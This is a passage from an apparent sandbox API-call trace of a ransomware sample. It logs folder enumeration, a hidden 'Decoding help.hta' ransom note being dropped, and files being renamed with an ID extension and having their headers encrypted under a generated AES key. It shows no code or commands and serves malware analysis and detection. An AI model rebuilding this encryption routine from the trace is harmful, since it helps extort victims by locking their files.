Workflow Foundation", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" [0041.203] GlobalMemoryStatus (in: lpBuffer=0xf88fd10 | out: lpBuffer=0xf88fd10) [0041.203] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1131c2a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f4 [0041.213] CloseHandle (hObject=0x3f4) returned 1 [0041.213] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0xf88fd30 | out: lpFindFileData=0xf88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 0 [0041.213] FindClose (in: hFindFile=0x5d7fd0 | out: hFindFile=0x5d7fd0) returned 1 Thread: id = 203 os_tid = 0x848 [0040.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\*.*", lpFindFileData=0xf9cfd30 | out: lpFindFileData=0xf9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8010 [0040.787] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.787] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xf9cfd30 | out: lpFindFileData=0xf9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.787] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.787] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.787] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xf9cfd30 | out: lpFindFileData=0xf9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0040.787] FindClose (in: hFindFile=0x5d8010 | out: hFindFile=0x5d8010) returned 1 Thread: id = 204 os_tid = 0x844 [0040.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0xfb0fd30 | out: lpFindFileData=0xfb0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8990 [0042.068] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.068] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xfb0fd30 | out: lpFindFileData=0xfb0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.068] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.068] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.068] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xfb0fd30 | out: lpFindFileData=0xfb0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 1 [0042.068] lstrcmpW (lpString1=".", lpString2="Views") returned -1 [0042.069] lstrcmpW (lpString1="..", lpString2="Views") returned -1 [0042.069] lstrcmpiW (lpString1="windows", lpString2="Views") returned 1 [0042.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*.*" [0042.069] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*.*") returned 45 [0042.069] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\", lpString2="Views" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views" [0042.069] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*.*" [0042.069] GlobalMemoryStatus (in: lpBuffer=0xfb0fd10 | out: lpBuffer=0xfb0fd10) [0042.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x995ab88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0042.070] CloseHandle (hObject=0x518) returned 1 [0042.070] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xfb0fd30 | out: lpFindFileData=0xfb0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 0 [0042.070] FindClose (in: hFindFile=0x5d8990 | out: hFindFile=0x5d8990) returned 1 Thread: id = 205 os_tid = 0x840 [0040.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*.*", lpFindFileData=0xfc4fd30 | out: lpFindFileData=0xfc4fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db2b8 [0042.194] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.195] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0xfc4fd30 | out: lpFindFileData=0xfc4fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.195] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.195] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.195] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0xfc4fd30 | out: lpFindFileData=0xfc4fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.195] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" [0042.195] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned 34 [0042.195] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Decoding help.hta" [0042.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\decoding help.hta")) returned 0xffffffff [0042.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x59c [0042.265] WriteFile (in: hFile=0x59c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xfc4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xfc4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.266] CloseHandle (hObject=0x59c) returned 1 [0042.266] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.266] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0042.266] lstrlenW (lpString="desktop.ini") returned 11 [0042.266] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" [0042.266] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned 34 [0042.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" [0042.267] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" [0042.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0042.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x59c [0042.267] CreateFileMappingA (hFile=0x59c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5a0 [0042.267] CryptAcquireContextA (in: phProv=0xfc4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xfc4fcec*=0x340a348) returned 1 [0048.455] CryptGenKey (in: hProv=0x340a348, Algid=0x6610, dwFlags=0x1, phKey=0xfc4fce8 | out: phKey=0xfc4fce8*=0x5db438) returned 1 [0048.455] CryptExportKey (in: hKey=0x5db438, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xfc4fbe4, pdwDataLen=0xfc4fce4 | out: pbData=0xfc4fbe4*, pdwDataLen=0xfc4fce4*=0x2c) returned 1 [0048.455] MapViewOfFile (hFileMappingObject=0x5a0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) returned 0x530000 [0048.457] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc4fbe4*, pdwDataLen=0xfc4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xfc4fbe4*, pdwDataLen=0xfc4fcf8*=0x100) returned 1 [0048.458] CryptEncrypt (in: hKey=0x5db438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0xfc4fce4*=0x180, dwBufLen=0x180 | out: pbData=0x530000*, pdwDataLen=0xfc4fce4*=0x180) returned 1 [0048.458] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0048.459] CloseHandle (hObject=0x5a0) returned 1 [0048.459] CryptDestroyKey (hKey=0x5db438) returned 1 [0048.459] CryptReleaseContext (hProv=0x340a348, dwFlags=0x0) returned 1 [0048.459] SetFilePointerEx (in: hFile=0x59c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.459] WriteFile (in: hFile=0x59c, lpBuffer=0xfc4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xfc4fcf8, lpOverlapped=0x0 | out: lpBuffer=0xfc4fbe4*, lpNumberOfBytesWritten=0xfc4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.694] WriteFile (in: hFile=0x59c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xfc4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xfc4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.694] CloseHandle (hObject=0x59c) returned 1 [0052.695] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.923] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0xfc4fd30 | out: lpFindFileData=0xfc4fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0056.923] lstrcmpW (lpString1=".", lpString2="Links") returned -1 [0056.923] lstrcmpW (lpString1="..", lpString2="Links") returned -1 [0056.923] lstrcmpiW (lpString1="windows", lpString2="Links") returned 1 [0056.923] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" [0056.923] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned 34 [0056.923] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\", lpString2="Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links" [0056.923] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*.*" [0056.923] GlobalMemoryStatus (in: lpBuffer=0xfc4fd10 | out: lpBuffer=0xfc4fd10) [0056.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x974a298, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x578 [0056.924] CloseHandle (hObject=0x578) returned 1 [0056.924] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0xfc4fd30 | out: lpFindFileData=0xfc4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0056.924] lstrcmpW (lpString1=".", lpString2="Microsoft Websites") returned -1 [0056.924] lstrcmpW (lpString1="..", lpString2="Microsoft Websites") returned -1 [0056.924] lstrcmpiW (lpString1="windows", lpString2="Microsoft Websites") returned 1 [0056.924] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" [0056.924] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned 34 [0056.924] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" [0056.924] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0056.924] GlobalMemoryStatus (in: lpBuffer=0xfc4fd10 | out: lpBuffer=0xfc4fd10) [0056.925] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9aab0e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x578 [0056.925] CloseHandle (hObject=0x578) returned 1 [0056.925] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0xfc4fd30 | out: lpFindFileData=0xfc4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0056.925] lstrcmpW (lpString1=".", lpString2="MSN Websites") returned -1 [0056.925] lstrcmpW (lpString1="..", lpString2="MSN Websites") returned -1 [0056.925] lstrcmpiW (lpString1="windows", lpString2="MSN Websites") returned 1 [0056.926] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" [0056.926] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned 34 [0056.926] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\", lpString2="MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" [0056.926] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" [0056.926] GlobalMemoryStatus (in: lpBuffer=0xfc4fd10 | out: lpBuffer=0xfc4fd10) [0056.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a718250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x578 [0056.927] CloseHandle (hObject=0x578) returned 1 [0056.927] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0xfc4fd30 | out: lpFindFileData=0xfc4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0056.927] lstrcmpW (lpString1=".", lpString2="Windows Live") returned -1 [0056.927] lstrcmpW (lpString1="..", lpString2="Windows Live") returned -1 [0056.927] lstrcmpiW (lpString1="windows", lpString2="Windows Live") returned -1 [0056.927] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" [0056.927] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned 34 [0056.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\", lpString2="Windows Live" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live" [0056.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*" [0056.927] GlobalMemoryStatus (in: lpBuffer=0xfc4fd10 | out: lpBuffer=0xfc4fd10) [0056.927] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10b161e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x578 [0056.928] CloseHandle (hObject=0x578) returned 1 [0056.928] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0xfc4fd30 | out: lpFindFileData=0xfc4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0056.928] FindClose (in: hFindFile=0x5db2b8 | out: hFindFile=0x5db2b8) returned 1 Thread: id = 206 os_tid = 0x83c [0040.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Templates\\*.*", lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 207 os_tid = 0x838 [0040.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*.*", lpFindFileData=0xfecfd30 | out: lpFindFileData=0xfecfd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5df0 [0040.494] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.494] FindNextFileW (in: hFindFile=0x5a5df0, lpFindFileData=0xfecfd30 | out: lpFindFileData=0xfecfd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.494] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.494] FindNextFileW (in: hFindFile=0x5a5df0, lpFindFileData=0xfecfd30 | out: lpFindFileData=0xfecfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0040.494] lstrcpyW (in: lpString1=0x10fe7650, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" [0040.494] lstrlenW 